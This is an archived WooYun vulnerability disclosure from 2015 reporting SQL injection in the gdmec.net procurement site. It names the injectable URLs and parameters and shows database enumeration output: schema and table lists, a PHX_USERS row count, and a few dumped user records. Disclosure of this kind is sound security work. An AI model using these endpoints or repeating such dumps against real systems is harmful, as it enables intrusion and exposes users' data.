乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-04: 细节已通知厂商并且等待厂商处理中 2015-11-09: 厂商已经主动忽略漏洞,细节向公众公开
国电
http://www.gdmec.net/phx/newsInfo.action?oid=1000333455&typeId=13&typeName=%E7%BD%91%E7%AB%99%E5%85%AC%E5%91%8A oid参数注入http://www.gdmec.net/phx/newsList.action?typeId=14&typeName=%E4%BA%A7%E5%93%81%E9%A2%91%E9%81%93 typeId参数注入http://www.gdmec.net/phx/newsDir.action?pid=2&ptypeName=%E7%89%A9%E8%B5%84%E9%9B%86%E5%9B%A2&typeName= pid参数注入http://www.gdmec.net/phx/newsInfo.action?oid=362416&pid=&typeId=14&ptypeName=&typeName=%E4%BA%A7%E5%93%81%E9%A2%91%E9%81%93¤tPage=1 oid参数http://www.gdmec.net/phx/newsList.action?pid=&typeId=13&ptypeName=&typeName=%E7%BD%91%E7%AB%99%E5%85%AC%E5%91%8A¤tPage= typeId参数
available databases [28]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] HR[*] IX[*] MDSYS[*] OE[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] PHX3[*] PHX3512[*] PHXHIS0607[*] PM[*] RMAN[*] SCOTT[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] TEST[*] WMSYS[*] XDBDatabase: PHX3[180 tables]+--------------------------------+| A || CCDDT_BID_PLAN || CCDDT_BUNDLE_SUPP || CCDPHX_COMPANY || CHENJINGQIAO20140402_BAK || DESKTOP_CORE_FILES || DESKTOP_LAUNCHERS || DESKTOP_MODULES || DESKTOP_MODULES_HAS_FILES || DESKTOP_MODULES_HAS_LAUNCHERS || DESKTOP_ROLES_HAS_MODULES || DESKTOP_STYLES || DESKTOP_THEMES || DESKTOP_WALLPAPERS || DT_BID_AUTHORIZER || DT_BID_BANK || DT_BID_BUNDLE || DT_BID_BUNDLE_FILE || DT_BID_DEPOSIT || DT_BID_DEPOSIT_214 || DT_BID_DEPOSIT_ALL214 || DT_BID_DEPOSIT_ALLLIFE || DT_BID_DEPOSIT_BANK_FORM || DT_BID_DEPOSIT_BANK_INFO || DT_BID_DEPOSIT_BANK_INFO0227 || DT_BID_DEPOSIT_HISTORY || DT_BID_DEPOSIT_HISTORY214 || DT_BID_DEPOSIT_HISTORY302 || DT_BID_DEPOSIT_HISTORY320 || DT_BID_DEPOSIT_HISTORY_ALLLIFE || DT_BID_DEPOSIT_TEMP || DT_BID_DEPOSIT_TEMP1 || DT_BID_DESC || DT_BID_FILE || DT_BID_MESH || DT_BID_MESH_PLAN || DT_BID_ORG_SYN || DT_BID_PLAN || DT_BID_PLAN_1 || DT_BID_PLAN_OLD || DT_BID_SUPP_AUTHORIZER_BANK || DT_BID_TAST || DT_BUNDLE_DESC || DT_BUNDLE_INVITATION_SUPP || DT_BUNDLE_MATERIAL || DT_BUNDLE_OPEN_MASTER || DT_BUNDLE_SUPP || DT_BUNDLE_SUPP_FILE || DT_BUNDLE_SUPP_PROFILE || DT_BUNDLE_SUPP_STATE || DT_BUYER || DT_CHARACTER_RCORD || DT_CLARIFY_FILE || DT_CLARIFY_INFO || DT_CLARIFY_RELATION || DT_COMPANY_PROFILE || DT_DIDDER_OPERATE_RECORD || DT_FICTIVE_ROOM || DT_FY_DETAIL_LEAGUER || DT_FY_DETAIL_LEAGUER_BACK || DT_MEMBER_PROFILE_REGULAR || DT_OPENER_OPERATE_RECORD || DT_PL_MAIN || DT_PL_MAIN_MORE || DT_PRODUCT || DT_PRODUCT_CLASS || DT_PROD_AREAS || DT_SUPERVISE_OPERATE_RECORD || DT_SUPPLIER || DT_SUPPLIER_OPEN_STATUS || DT_TAST_CODE_RETAIN || DT_TAST_CODE_SEQ || DT_USER_PROFILE || DT_VIDEO_POOL || DT_VIDEO_SRC || DX_BAK_20140219 || DX_BAK_20140412 || FUND_SURPLUS || IBMSNAP_PRUNCNTL || IBMSNAP_PRUNE_SET || IBMSNAP_REGISTER || IBMSNAP_REG_SYNCH || IBMSNAP_SIGNAL || JBPM4EXT_DEPLOYMENT || JBPM4EXT_PROC_DEF_ND_ACTION || JBPM4EXT_PROC_DEF_ND_ACTION_T || JBPM4EXT_PROC_DEF_ND_ACT_VAR || JBPM4EXT_PROC_DEF_NODE || JBPM4EXT_PROC_DEF_NODE_TYPE || JBPM4EXT_PROC_DEF_PARTICIPATOR || JBPM4EXT_PROC_DEF_PART_VAR || JBPM4EXT_PROC_DEF_SWIMLANE || JBPM4EXT_PROC_DEF_TRANSATION || JBPM4EXT_PROC_DEF_TR_ACTION || JBPM4EXT_PROC_DEF_TR_ACTION_T || JBPM4EXT_PROC_DEF_TR_ACT_VAR || JBPM4EXT_PROC_INST || JBPM4EXT_TASK_INFO || JBPM4TEST || JBPM4_DEPLOYMENT || JBPM4_DEPLOYPROP || JBPM4_EXECUTION || JBPM4_HIST_ACTINST || JBPM4_HIST_DETAIL || JBPM4_HIST_PROCINST || JBPM4_HIST_TASK || JBPM4_HIST_VAR || JBPM4_JOB || JBPM4_LOB || JBPM4_PARTICIPATION || JBPM4_PROPERTY || JBPM4_SWIMLANE || JBPM4_TASK || JBPM4_VARIABLE || MEMBER_PROFILE_REGULAR_BACK || MR_PROD_AREAS || NEWS_CLASS || NEWS_CLASS_RE_COMPANY || NEWS_FILE || NEWS_INFO || NEWS_STAT || PEC_BID_PROJECT || PEC_FILE || PEC_MEMBER_PROFILE_REGULAR || PEC_UPLOAD_FILE || PHX_ATTRIBUTE || PHX_ATTRIBUTE_FORMAT || PHX_ATTRIBUTE_TYPE || PHX_COMPANY || PHX_COMPANY_TYPE || PHX_COMPANY_TYPE_RE_ROLES || PHX_DEPARTMENT || PHX_LOG || PHX_LOG_DEAL_STATUS || PHX_LOG_TYPE || PHX_MENU_INFO || PHX_ORGANIZATION || PHX_ORGANIZATION_TYPE || PHX_ORG_USERS_RELATION || PHX_PACKAGE || PHX_ROLES || PHX_SCHEMA || PHX_SCHEMA_HELP || PHX_SCHEMA_TYPE || PHX_SECURITY_LEVEL || PHX_SERVICE || PHX_SERVICE_BAK || PHX_SERVICE_CATALOG || PHX_SERVICE_CLOB || PHX_SERVICE_CONDITION || PHX_SERVICE_ELEMENT || PHX_SERVICE_ELEMENT_STYLE || PHX_SERVICE_ELEMENT_TYPE || PHX_SERVICE_HELP || PHX_SERVICE_MENUBAR || PHX_SERVICE_REF_SCHEMAS || PHX_SERVICE_ROLES_RELATION || PHX_SERVICE_TYPE || PHX_TEMPL_QUERY || PHX_TEMPL_QUERY_ITEM || PHX_TIPS || PHX_TIPS_TYPE || PHX_USERS || PHX_USERS_ROLES_RELATIONS || PHX_VERSION || PHX_ZONE || SMARTTEST || SMRT || SMRT_TEST || SMRT_UNSUCCESS_BAK_20130613 || TEMP_QSX_20130822 || TEMP_REALBUYER || TEST || TEST1 || TEST1TREE || TEST2 || TEST2012 || TESTDY || TEST_COMPANY || TEXT_IMPORT_20130827 |+--------------------------------+Database: PHX3+-----------+---------+| Table | Entries |+-----------+---------+| PHX_USERS | 77976 |+-----------+---------+
-------+------+------+--------+---------+----------+----------+---------------------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+--------------+-----------------+------------------+--------------------+| OID | NAME | ROLE | GENDER | COMPANY | USER_TEL | PASSWORD | USER_NAME | SELF_STYLE | USER_EMAIL | DEPARTMENT | RUN_STATUS | CREATE_DATE | USER_MOBILE | MODIFY_FLAG | DELETE_FLAG | USER_COMPANY | CODE_SPECIALITY | CERTIFICATE_TYPE | CERTIFICATE_NUMBER |+-------+------+------+--------+---------+----------+----------+---------------------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+--------------+-----------------+------------------+--------------------+| 68449 | NULL | NULL | NULL | 29205 | NULL | NULL | 29205 $ tsest1234 $ | 3 | NULL | NULL | 1 | 23-11月-09 | NULL | NULL | 1 | NULL | NULL | NULL | NULL || 69186 | NULL | NULL | NULL | 29532 | NULL | NULL | 29532 $ 平阳化工机械总厂 $ | 3 | NULL | NULL | 1 | 19-12月-09 | NULL | NULL | 1 | NULL | NULL | NULL | NULL || 47489 | NULL | NULL | NULL | 20464 | NULL | NULL | 20464 $ 四川爆破公司 $ | 3 | NULL | NULL | 1 | 18-9月 -07 | NULL | NULL | 1 | NULL | NULL | NULL | NULL
危害等级:无影响厂商忽略
忽略时间:2015-11-09 14:04
漏洞Rank:4 (WooYun评价)
暂无